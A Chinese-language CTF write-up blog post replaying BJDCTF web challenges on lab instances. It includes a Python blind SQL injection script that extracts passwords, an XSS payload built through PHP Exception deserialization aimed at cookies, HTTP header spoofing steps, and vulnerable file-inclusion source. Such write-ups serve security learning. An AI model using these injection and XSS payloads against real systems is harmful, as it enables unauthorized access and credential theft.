<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="paixiaoxing">
    
    <title>
        
            BJDCTF复现 |
        
        paixiaoxing&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/paidaxing.jpg">
    
<link rel="stylesheet" href="/css/font-awesome.min.css">

    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en","path":"search.xml"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":false,"init_open":true},"style":{"primary_color":"#0066CC","avatar":"/images/paidaxing.jpg","favicon":"/images/paidaxing.jpg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":false,"scale":false},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"“请用绝对的理智压制不该有的情绪。”"},"scroll":{"progress_bar":{"enable":true},"percent":{"enable":true}}},"local_search":{"enable":false,"preload":false},"code_copy":{"enable":true,"style":"mac"},"pjax":{"enable":false},"lazyload":{"enable":false},"version":"3.4.5"};
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/paidaxing.jpg">
                </a>
            
            <a class="logo-title" href="/">
                paixiaoxing&#39;s Blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                TAGS
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                LINKS
                            </a>
                        </li>
                    
                    
                </ul>
            </div>
            <div class="mobile">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">TAGS</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">LINKS</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">BJDCTF复现</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/paidaxing.jpg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">paixiaoxing</span>
                        
                            <span class="author-label">Lv5</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;
        <span class="pc">2022-03-16 20:42:15</span>
        <span class="mobile">2022-03-16 20:42</span>
    </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/BJDCTF/">BJDCTF</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <p>今天复现了一下BJDCTF</p>
<h2 id="假猪套天下第一"><a href="#假猪套天下第一" class="headerlink" title="假猪套天下第一"></a>假猪套天下第一</h2><p>首先进入页面</p>
<p>是一个登录页面，以为是注入，随便输入了一下发现进去了，抓个包</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/1.png" alt="1"></p>
<p>发现藏了一个网页，访问一下</p>
<p>第一次访问的时候网页显示发生了一个错误，刷新一下就可以发现下一步的提示（如果不刷新抓包的话没有在cookie中没有time）</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/2.png" alt="1"></p>
<p>抓个包</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/3.png" alt="1"></p>
<p>拿去解码一下发现是今天的日期，加九十九年，进入下一个提示</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/4.png" alt="1"></p>
<p>需要我们的ip是<code>localhost</code>自然而然想到<code>X-Forwarded-For</code></p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/5.png" alt="1"></p>
<p>另一种方式，可以用client-ip也一样是伪造ip</p>
<p>后面是需要伪造</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">who come from gem-love.com</span><br><span class="line">Referer: gem-love.com</span><br><span class="line">Sorry, this site is only optimized for browsers that run on Commodo 64</span><br><span class="line">User-Agent: Commodore 64</span><br><span class="line">Sorry, this site is only optimized for those whose email is root@gem-love.com</span><br><span class="line">From: root@gem-love.com</span><br><span class="line">Sorry, this site is only optimized for those who use the http proxy of y1ng.vip. if you dont have the proxy, pls contact us to buy, ￥100/Month</span><br><span class="line">Via: y1ng.vip</span><br></pre></td></tr></table></figure>

<p>最后可以在这里看到flag的base64编码（如果用hackbar添加头的话需要抓包，源码不显示）</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/6.png" alt="1"></p>
<h2 id="简单注入"><a href="#简单注入" class="headerlink" title="简单注入"></a>简单注入</h2><p>进入页面是一个登录框，结合题目名称，应该就是在这里注入了，fuzz发现单引号双引号全被过滤了</p>
<p>可以用的符号是</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">`!@#$%^*()_+[]&#123;&#125;\|:,./&lt;&gt;?</span><br></pre></td></tr></table></figure>

<p>可以发现反斜杠还有#没有被过滤，再找找别的，发现再robots,txt中藏了一个文件进去访问发现</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/7.png" alt="1"></p>
<p>他给出了我们在登陆框的查询语句，审计一下，单引号被过滤了所以username那边无法闭合，但是反斜杠没有被过滤，可以再最后添加一个反斜杠转义后面的单引号，然后可以用＃注释掉后面的单引号构造另一种闭合，也就是我们可以再password这添加我们的查询语句，测试的时候发现or没有被过滤，而为真的时候页面会回显</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/8.png" alt="1"></p>
<p>显而易见这就是一个盲注了，构造payload脚本：（因为查找过于慢，照着之前写的finalsql注入的脚本改的）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &quot;http://b49b6771-4b40-4bd5-8959-4bea5ae5fd40.node4.buuoj.cn:81/index.php&quot;</span><br><span class="line"></span><br><span class="line">data = &#123;&quot;username&quot;: &quot;admin\\&quot;, &quot;password&quot;: &quot;&quot;&#125;</span><br><span class="line">result = &quot;&quot;</span><br><span class="line">i = 0</span><br><span class="line"></span><br><span class="line">while (True):</span><br><span class="line">    i = i + 1</span><br><span class="line">    head = 32</span><br><span class="line">    tail = 127</span><br><span class="line"></span><br><span class="line">    while (head &lt; tail):</span><br><span class="line">        mid = (head + tail) &gt;&gt; 1</span><br><span class="line"></span><br><span class="line">        # payload = &quot;or/**/if(ascii(substr(username,%d,1))&gt;%d,1,0)#&quot;%(i,mid)</span><br><span class="line">        payload = &quot;or/**/if(ascii(substr(password,%d,1))&gt;%d,1,0)#&quot; % (i, mid)</span><br><span class="line"></span><br><span class="line">        data[&#x27;password&#x27;] = payload</span><br><span class="line">        r = requests.post(url, data=data)</span><br><span class="line"></span><br><span class="line">        if &quot;stronger&quot; in r.text:</span><br><span class="line">            head = mid + 1</span><br><span class="line">        else:</span><br><span class="line">            tail = mid</span><br><span class="line"></span><br><span class="line">    last = result</span><br><span class="line"></span><br><span class="line">    if head != 32:</span><br><span class="line">        result += chr(head)</span><br><span class="line">    else:</span><br><span class="line">        break</span><br><span class="line">    print(result)</span><br></pre></td></tr></table></figure>

<h2 id="Schrodinger"><a href="#Schrodinger" class="headerlink" title="Schrödinger"></a>Schrödinger</h2><p>题目有一段很长的话，翻译一下大概就是，这个网站可以爆破出各种网站的密码之类的，留下了一个文本框，可能是要我们爆破什么网栈的密码，有一个input输入，以及一个check，如果再未完成之前check可能会失败。</p>
<p>题目就是这个意思，现在应该要做的就是网站需要我们爆破的是什么密码：</p>
<p>在复制文本翻译的时候，意外发现了隐藏的一句话，被标白色了：</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/9.png" alt="1"></p>
<p>打开看一下</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/10.png" alt="1"></p>
<p>也就是我们需要爆破这个网站了，输入网站开始等待。</p>
<p>等待了很久发现很慢很慢好像没有什么用，之前点了check发现又得重来，所以抓个包看看</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/11.png" alt="1"></p>
<p>发现比input之前多了一段代码，%3D是<code>==</code>很明显是base64编码，拿去解密一下看到是一个时间的编码，那我们这里出现的时间说明，这个解密应该是虚假的，但是时间应该是多少呢，既然他根据时间来，我们把时间删了他是不是可以直接出来flag？删除</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/12.png" alt="1"></p>
<p>可以看到有一个av号，打开看下哦吼：量子力学，一个正经课程，flag应该不会藏在视频里面，去评论区看看找到了flag(不得不说真阴间啊)</p>
<h2 id="XSS之光"><a href="#XSS之光" class="headerlink" title="XSS之光"></a>XSS之光</h2><p>进入题目就被劝退让我gun，哈哈哈。看了一下前端，啥也没有，扫一下目录发现有git目录，应该是源码泄露了，用githack下载源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;yds_is_so_beautiful&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> unserialize(<span class="variable">$a</span>);</span><br></pre></td></tr></table></figure>

<p>有一个get传参，然后输出一个反序列化的结果，既然是xss之光，应该就是执行xss语句，那么我们怎么让他反序列化之后是一个xss语句，因为题目中没有给出类，所以我们只能利用php的原生类，可以用error原生类或者exception原生类，error适用版本是7版本，exception适用版本是5或者7，所以这里用exception</p>
<p>创建一个序列化脚本</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="built_in">Exception</span>(<span class="string">&quot;&lt;script&gt;alert(1)&lt;/script&gt;&quot;</span>);</span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize(<span class="variable">$a</span>));</span><br></pre></td></tr></table></figure>

<p>就可以执行弹窗命令了，一般要顺带信息出来的话，flag一般都是藏在cookie里面的</p>
<p>所以我们中间的数字替换成<code>document.cookie</code>尝试一下，发现正确执行弹窗，但是返回的好像是当前页面的cookie，看了大佬们的wp发现需要进行一个<code>windows.local.href</code>进行访问一个网站再弹出flag的时候就会自动更改flag（因为更改的flag是由服务器set更改来的，所以需要访问一个网站）</p>
<h2 id="elementmaster（元素大师）"><a href="#elementmaster（元素大师）" class="headerlink" title="elementmaster（元素大师）"></a>elementmaster（元素大师）</h2><p>题目页面是一张图片，啥也没有，找找有什么特别的地方，发现再源码里面有两个id非常奇怪，是隐藏属性</p>
<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/13.png" alt="1"></p>
<p>发现经过16进制编码之后前面一个是Po.后面是php</p>
<p>访问一下这个网页，乍一看以为是空白网站，自己一看有一个点，经过漫长的猜测寻找，发现还是不懂，稍稍的找了一下wp，一看第一行，说的Po是化学元素，再结合页面里面只有一个点，猜测应该是爆破，访问化学元素周期表里面的网站，然后将里面的数据进行拼接拿到flag</p>
<p>附上payload脚本：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">url = &#x27;http://a20a2a2e-59ba-40e3-9297-fdecb894b7f3.node4.buuoj.cn:81/&#x27;</span><br><span class="line">asd = &#x27;&#x27;</span><br><span class="line">elemts = [&#x27;H&#x27;, &#x27;He&#x27;, &#x27;Li&#x27;, &#x27;Be&#x27;, &#x27;B&#x27;, &#x27;C&#x27;, &#x27;N&#x27;, &#x27;O&#x27;, &#x27;F&#x27;, &#x27;Ne&#x27;, &#x27;Na&#x27;, &#x27;Mg&#x27;, &#x27;Al&#x27;, &#x27;Si&#x27;, &#x27;P&#x27;, &#x27;S&#x27;, &#x27;Cl&#x27;, &#x27;Ar&#x27;,</span><br><span class="line">         &#x27;K&#x27;, &#x27;Ca&#x27;, &#x27;Sc&#x27;, &#x27;Ti&#x27;, &#x27;V&#x27;, &#x27;Cr&#x27;, &#x27;Mn&#x27;, &#x27;Fe&#x27;, &#x27;Co&#x27;, &#x27;Ni&#x27;, &#x27;Cu&#x27;, &#x27;Zn&#x27;, &#x27;Ga&#x27;, &#x27;Ge&#x27;, &#x27;As&#x27;, &#x27;Se&#x27;, &#x27;Br&#x27;,</span><br><span class="line">         &#x27;Kr&#x27;, &#x27;Rb&#x27;, &#x27;Sr&#x27;, &#x27;Y&#x27;, &#x27;Zr&#x27;, &#x27;Nb&#x27;, &#x27;Mo&#x27;, &#x27;Te&#x27;, &#x27;Ru&#x27;, &#x27;Rh&#x27;, &#x27;Pd&#x27;, &#x27;Ag&#x27;, &#x27;Cd&#x27;, &#x27;In&#x27;, &#x27;Sn&#x27;, &#x27;Sb&#x27;, &#x27;Te&#x27;,</span><br><span class="line">         &#x27;I&#x27;, &#x27;Xe&#x27;, &#x27;Cs&#x27;, &#x27;Ba&#x27;, &#x27;La&#x27;, &#x27;Ce&#x27;, &#x27;Pr&#x27;, &#x27;Nd&#x27;, &#x27;Pm&#x27;, &#x27;Sm&#x27;, &#x27;Eu&#x27;, &#x27;Gd&#x27;, &#x27;Tb&#x27;, &#x27;Dy&#x27;, &#x27;Ho&#x27;, &#x27;Er&#x27;, &#x27;Tm&#x27;,</span><br><span class="line">         &#x27;Yb&#x27;, &#x27;Lu&#x27;, &#x27;Hf&#x27;, &#x27;Ta&#x27;, &#x27;W&#x27;, &#x27;Re&#x27;, &#x27;Os&#x27;, &#x27;Ir&#x27;, &#x27;Pt&#x27;, &#x27;Au&#x27;, &#x27;Hg&#x27;, &#x27;Tl&#x27;, &#x27;Pb&#x27;, &#x27;Bi&#x27;, &#x27;Po&#x27;, &#x27;At&#x27;, &#x27;Rn&#x27;,</span><br><span class="line">         &#x27;Fr&#x27;, &#x27;Ra&#x27;, &#x27;Ac&#x27;, &#x27;Th&#x27;, &#x27;Pa&#x27;, &#x27;U&#x27;, &#x27;Np&#x27;, &#x27;Pu&#x27;, &#x27;Am&#x27;, &#x27;Cm&#x27;, &#x27;Bk&#x27;, &#x27;Cf&#x27;, &#x27;Es&#x27;, &#x27;Fm&#x27;,&#x27;Md&#x27;, &#x27;No&#x27;, &#x27;Lr&#x27;,</span><br><span class="line">         &#x27;Rf&#x27;, &#x27;Db&#x27;, &#x27;Sg&#x27;, &#x27;Bh&#x27;, &#x27;Hs&#x27;, &#x27;Mt&#x27;, &#x27;Ds&#x27;, &#x27;Rg&#x27;, &#x27;Cn&#x27;, &#x27;Nh&#x27;, &#x27;Fl&#x27;, &#x27;Mc&#x27;, &#x27;Lv&#x27;, &#x27;Ts&#x27;, &#x27;Og&#x27;, &#x27;Uue&#x27;]</span><br><span class="line">for i in elemts:</span><br><span class="line">    io = requests.get(url + i + &quot;.php&quot;)</span><br><span class="line">    if(io.status_code==200):</span><br><span class="line">        asd += io.text</span><br><span class="line">        print(asd)</span><br></pre></td></tr></table></figure>

<p><img src="/2022/03/16/BJDCTF%E5%A4%8D%E7%8E%B0/14.png" alt="1"></p>
<p>拿到flag，说实话脑洞题目（完全没往这方面想QAQ）</p>
<h2 id="文件探测"><a href="#文件探测" class="headerlink" title="文件探测"></a>文件探测</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">system.php</span><br><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">if (!isset($_COOKIE[&#x27;y1ng&#x27;]) || $_COOKIE[&#x27;y1ng&#x27;] !== sha1(md5(&#x27;y1ng&#x27;)))&#123;</span><br><span class="line">    echo &quot;&lt;script&gt;alert(&#x27;why you are here!&#x27;);alert(&#x27;fxck your scanner&#x27;);alert(&#x27;fxck you! get out!&#x27;);&lt;/script&gt;&quot;;</span><br><span class="line">    header(&quot;Refresh:0.1;url=index.php&quot;);</span><br><span class="line">    die;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">$</span><span class="bash">str2 = <span class="string">&#x27;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Error:&amp;nbsp;&amp;nbsp;url invalid&lt;br&gt;~$ &#x27;</span>;</span></span><br><span class="line"><span class="meta">$</span><span class="bash">str3 = <span class="string">&#x27;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Error:&amp;nbsp;&amp;nbsp;damn hacker!&lt;br&gt;~$ &#x27;</span>;</span></span><br><span class="line"><span class="meta">$</span><span class="bash">str4 = <span class="string">&#x27;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Error:&amp;nbsp;&amp;nbsp;request method error&lt;br&gt;~$ &#x27;</span>;</span></span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">home.php</span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">setcookie(&quot;y1ng&quot;, sha1(md5(&#x27;y1ng&#x27;)), time() + 3600);</span><br><span class="line">setcookie(&#x27;your_ip_address&#x27;, md5($_SERVER[&#x27;REMOTE_ADDR&#x27;]), time()+3600);</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">if(isset($</span><span class="bash">_GET[<span class="string">&#x27;file&#x27;</span>]))&#123;</span></span><br><span class="line">    if (preg_match(&quot;/\^|\~|&amp;|\|/&quot;, $_GET[&#x27;file&#x27;])) &#123;</span><br><span class="line">        die(&quot;forbidden&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if(preg_match(&quot;/.?f.?l.?a.?g.?/i&quot;, $_GET[&#x27;file&#x27;]))&#123;</span><br><span class="line">        die(&quot;not now!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if(preg_match(&quot;/.?a.?d.?m.?i.?n.?/i&quot;, $_GET[&#x27;file&#x27;]))&#123;</span><br><span class="line">        die(&quot;You! are! not! my! admin!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if(preg_match(&quot;/^home$/i&quot;, $_GET[&#x27;file&#x27;]))&#123;</span><br><span class="line">        die(&quot;禁止套娃&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    else&#123;</span><br><span class="line">        if(preg_match(&quot;/home$/i&quot;, $_GET[&#x27;file&#x27;]) or preg_match(&quot;/system$/i&quot;, $_GET[&#x27;file&#x27;]))&#123;</span><br><span class="line">            $file = $_GET[&#x27;file&#x27;].&quot;.php&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        else&#123;</span><br><span class="line">            $file = $_GET[&#x27;file&#x27;].&quot;.fxxkyou!&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        echo &quot;现在访问的是 &quot;.$file . &quot;&lt;br&gt;&quot;;</span><br><span class="line">        require $file;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    echo &quot;&lt;script&gt;location.href=&#x27;./home.php?file=system&#x27;&lt;/script&gt;&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>




        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li>Post title：BJDCTF复现</li>
        <li>Post author：paixiaoxing</li>
        <li>Create time：2022-03-16 20:42:15</li>
        <li>
            Post link：https://keep.xpoet.cn/2022/03/16/BJDCTF复现/
        </li>
        <li>
            Copyright Notice：All articles in this blog are licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> unless stating additionally.
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/BJDCTF/">#BJDCTF</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2022/03/20/%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA-Web11/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">华东南赛区-Web11</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2022/03/13/SWPUCTF-2018-easyphp/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">SWPUCTF-2018-simplephp</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2020</span>
              -
            
            2022&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">paixiaoxing</a>
        </div>
        
            <script async  src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        Visitor Count&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        Totalview&nbsp;<span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;|&nbsp;Theme&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.5</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%81%87%E7%8C%AA%E5%A5%97%E5%A4%A9%E4%B8%8B%E7%AC%AC%E4%B8%80"><span class="nav-number">1.</span> <span class="nav-text">假猪套天下第一</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">简单注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Schrodinger"><span class="nav-number">3.</span> <span class="nav-text">Schrödinger</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS%E4%B9%8B%E5%85%89"><span class="nav-number">4.</span> <span class="nav-text">XSS之光</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#elementmaster%EF%BC%88%E5%85%83%E7%B4%A0%E5%A4%A7%E5%B8%88%EF%BC%89"><span class="nav-number">5.</span> <span class="nav-text">elementmaster（元素大师）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E6%8E%A2%E6%B5%8B"><span class="nav-number">6.</span> <span class="nav-text">文件探测</span></a></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>





    
<script src="/js/code-copy.js"></script>





<div class="post-scripts">
    
        
<script src="/js/left-side-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/toc.js"></script>

    
</div>



</body>
</html>
